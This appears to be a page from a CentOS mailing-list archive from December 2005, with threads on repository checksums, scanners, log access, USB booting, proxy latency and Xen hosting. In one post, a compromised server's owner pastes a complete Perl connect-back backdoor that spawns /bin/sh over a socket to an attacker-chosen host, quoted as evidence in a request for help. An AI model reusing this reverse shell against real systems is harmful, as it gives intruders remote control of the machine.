Discuss December 2005

discuss@lists.centos.org

219 participants
328 discussions

Re: [users] CentOS 4.2 dag repo problem.
by Dries Verachtert 05 Dec '05

05 Dec '05

Hello, It would be nice if we could get a full list of packages which have a wrong sha1 checksum. I don't have the bandwidth for a full mirror of all of Dag's rpms and i also don't have shell access to such a mirror. So a small request for a mirror admin: The following checks the files repodata/*.xml.gz against the sha1 sums in repomd.xml and checks the RPMS/*.rpm files against the sha1 sums in primary.xml.gz. Can you run this on the repodata files of at least the el4-i386 rpms? If possible: on every distro/arch combination found in Dag's repo :-) example: cd /mybigmirror/apt.sw.be/redhat/el4/en/i386/dag/ # should have the same contents as http://apt.sw.be/redhat/el4/en/i386/dag/ xsltproc repomdtoshasum.xslt repodata/repomd.xml | sha1sum -c gunzip -c repodata/primary.xml.gz | xsltproc primarytoshasum.xslt - | sha1sum -c Those xslt files are in attach and you probably need to add a path to those xslt files. They're only quick hacks but they seem to work on a couple of rpms on my pc. It might be interesting to capture the output of both commands, for example: xsltproc repomdtoshasum.xslt repodata/repomd.xml | sha1sum -c >> output.txt 2>&1 gunzip -c repodata/primary.xml.gz | xsltproc primarytoshasum.xslt - | sha1sum -c >> output.txt 2>&1 Of course this is far from perfect: it doesn't check the .hdr files, apt config or old yum config stuff.. but it might give the list of rpm packages with a wrong checksum so we can ask heanet to check those files. thanks in advance! Dries -- Rpm packages for Red Hat Enterprise Linux, Fedora Core and Aurora at http://dries.ulyssis.org/rpm/

2 1

Good vulnerability Scanner besides Nessus?
by James Pifer 05 Dec '05

05 Dec '05

Anyone know of a good vulnerability scanner they would recommend besides Nessus? Been googling, but a recommendation is preferred. Looking for another to run and compare the results I get with Nessus. Thanks, James

1 0

access to httpd logs
by James Pifer 05 Dec '05

05 Dec '05

I need to enable some access to the httpd logs over ftp so they can be analyzed by another application to get a report. I used to do this on Windows NT before replacing the server with CentOS. Thanks to help from another thread I have an ftp server enabled on the web server. I thought the easiest thing to do would be to create an id for the application to connect with, then provide a symlink to the logs in that generic user's home directory. The problem is the logs are owned by root. How can I make them readable by this generic id without completely compromising security? Plus, as the logs rotate this id will still need access. Any suggestions? Thanks, James

6 12

Booting from an external USB drive?
by Bart Schaefer 05 Dec '05

05 Dec '05

Is it possible? Booting the installer from the CD works, finds the USB drive, and allows me to put the root filesystem on it. I put the /boot partition on the internal hard drive and installed GRUB in the boot record of that partition. GRUB shows the menu and begins booting, but eventually fails with the error that /dev/sda5 (the external partition) does not exist. I was hoping (perhaps in vain) that initrd would provide the necessary modules/hooks to mount the USB device. Is there some step of the installation that I'm missing, or something extra that I need to do by hand, like in the old days when LILO had to be explicitly told about SCSI cards?

3 2

Re: [CentOS] Configuring X after instal on CentOS4
by James B. Byrne 05 Dec '05

05 Dec '05

On Fri, 02 Dec 2005 22:36:26 -0600, Johnny Hughes <mailing- lists(a)hughesjr.com> wrote: > All the relevant documentation that is distributable from the > upstream provider is available here: > http://mirror.centos.org/centos/4/docs/ Thanks for the link. My original question had more to do with how one discovers the appropriate name for the command in question. Once one has that information it is usually a trivial exercise to track down the documentation and discover how to use the tool. However, there does not seem to be any internal reference to system- config-display in any of the X related man pages. Is this upstream decision purposeful or inadvertent? In any case, while web based documentation is wonderful, there are still frequent occasions when system resident documentation is all one has access to. The absence of documentation for setup and configuration applications can prove most inconvenient in those circumstances. Regards, Jim -- *** e-mail is not a secure channel *** mailto:byrnejb.<token>@harte-lyne.ca James B. Byrne Harte & Lyne Limited vox: +1 905 561 1241 9 Brockley Drive fax: +1 905 561 0757 Hamilton, Ontario <token> = hal Canada L8E 3C3

1 0

slow responding firewall server
by Peter Farrow 05 Dec '05

05 Dec '05

Hi There, I recently suffered a serious hardware failure on one of my firewalls, (motherboard died), this machine was originally a redhat 9 box, on an Athlon 2200 with 512Megs RAM, this machine was doing the following jobs for a small network at a relatives house: Firewall (IPTABLES) Transparent proxy (squid) Sendmail smarthost IMAP mail server SAMBA file server IPSEC tunnel to my home. The only machines I had to replace it with were an Intel SC5000 chassis with twin PIII 1GHz CPUs on SCSI RAID (1 Gig RAM) and a compaq PII 450 (512Megs) software RAID on IDE 40Gig drives. So I installed Centos 4.2 on both, split the IMAP and SAMBA onto the SC5000 and put the firewall, Squid and sendmail smarthost on the Compaq. The system is connected to the net via a 2Meg Line. While each of these machines easily copes with the jobs they have to do, I have noticed (or rather my relative noticed and I agreed) that web browsing now has a high latency. i.e. you go to a new web page, there is a substantial pause, before the page starts to load (substantial a few seconds, whereas previously it was instant). DNS is all ok and working fine, there are no delays there. The DSL line shows very little latency from the net and outgoing from the lan. I note that squid uses a fair amout of CPU on the PII450 from time to time, but can't seem to get a handle on what is causing the delay. The only thing I can think of is that the PII450 running squid is just slow compared to the old Athlon box and I am reaping the "benefits" of that. I do find that hard to believe though, since the box isn't running X or anthing else extra. I also notice that sometimes some downloads, particularly large ones just seem to grind to a halt after a few megs, and sometimes then carry on a bit later if left, right up to full speed of the line. During this slowdown, the latency of the line even with large pings is fine, so I am sure the connection is good. Is Centos4.2 now so heavy that a PII450 is not enough for a transparent proxy and smarthost.... Any comments/ideas are welcome... Pete

4 11

Apache/PHP Security Help.
by Ajay Sharma 05 Dec '05

05 Dec '05

I have a personal apache/mail server that is getting hacked and I'm not sure how the person is getting in. What's happening is that every few days, the below script will show up in /tmp as 'dc.txt', owned by apache and then a TON of mail is queued up to a bunch of addresses in @uol.com.br. I initially thought they got in becuase I had an outdated version of 'gallery' installed. I rebuild the server and update gallery and thought I should be okay. But now they are still getting in and instead of blindly rebuilding the server, I need to figure out how they are able to run perl scripts on the server. Any suggestions? --Ajay PS. This is a CentOS 4.2 box running the latest apache/php RPMS. --------------------------- #!/usr/bin/perl use Socket; print "Data Cha0s Connect Back Backdoor\n\n"; if (!$ARGV[0]) { printf "Usage: $0 [Host] <Port>\n"; exit(1); } print "[*] Dumping Arguments\n"; $host = $ARGV[0]; $port = 80; if ($ARGV[1]) { $port = $ARGV[1]; } print "[*] Connecting...\n"; $proto = getprotobyname('tcp') || die("Unknown Protocol\n"); socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n"); my $target = inet_aton($host); if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) { die("Unable to Connect\n"); } print "[*] Spawning Shell\n"; if (!fork( )) { open(STDIN,">&SERVER"); open(STDOUT,">&SERVER"); open(STDERR,">&SERVER"); exec {'/bin/sh'} '-bash' . "\0" x 4; exit(0); } print "[*] Datached\n\n"; --------------------------------

4 4

CentOS on Xen question (Xen Hosting)
by Sanjay Arora 05 Dec '05

05 Dec '05

List: I am considering getting a Xen based virtual server for providing static web-site, secondary MX & DNS. Pros & Cons? anyone? Minimal install from the centos server CD (centos will be the guest OS) with Apache, Selinux, Iptables, qmail, spamassasin, djbdns, clam, mysql, postgreSQL & INN. Any install issues? What should be the HDD & RAM requirement, in addition to my database size & say 10 GB for mail? Also, how much bandwidth saving can I get with say 10 MB mail (from mailing lists) and script to compress and get it by rsync? Secondly, is it possible to compress news server feed & batch download in compressed format, reliably. I am trying to save on extra bandwidth costs here in India. Also, can someone recommend and Xen Virtual host provider on my direct email address...anyone who is small & can do a bit of hand-holding initially...without a big dollar denominated bill ;-) Small shoestring budget..a very very small shoestring ;-) With best regards.

4 3

RE: [CentOS] Permission Denied: /proc/cpuinfo
by Marc Powell 05 Dec '05

05 Dec '05

> -----Original Message----- > From: centos-bounces(a)centos.org [mailto:centos-bounces@centos.org] On > Behalf Of Mark Sargent > Sent: Sunday, December 04, 2005 10:38 PM > To: CentOS mailing list > Subject: [CentOS] Permission Denied: /proc/cpuinfo > > HI All, > > why do I get the below, > > [root@status1 ~]# /proc/cpuinfo > -bash: /proc/cpuinfo: Permission denied It's not an executable program. Try 'cat /proc/cpuinfo'. -- Marc

3 3

Scalix on CentOS
by Robert Moskowitz 05 Dec '05

05 Dec '05

www.scalix.com the community edition. I have not gone too far in, the system I would run it on won't be built for a week, but it lists Fedora Core 4 as one of the OS options. Also RH Enterprise 3 or 4. What do I select to install it on CentOS 4.2?

2 2

← Newer
1
...
25
26
27
28
29
30
31
32
33
Older →

Jump to page:

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

2011

2010

2009

2008

2007

2006

2005

2004

Discuss December 2005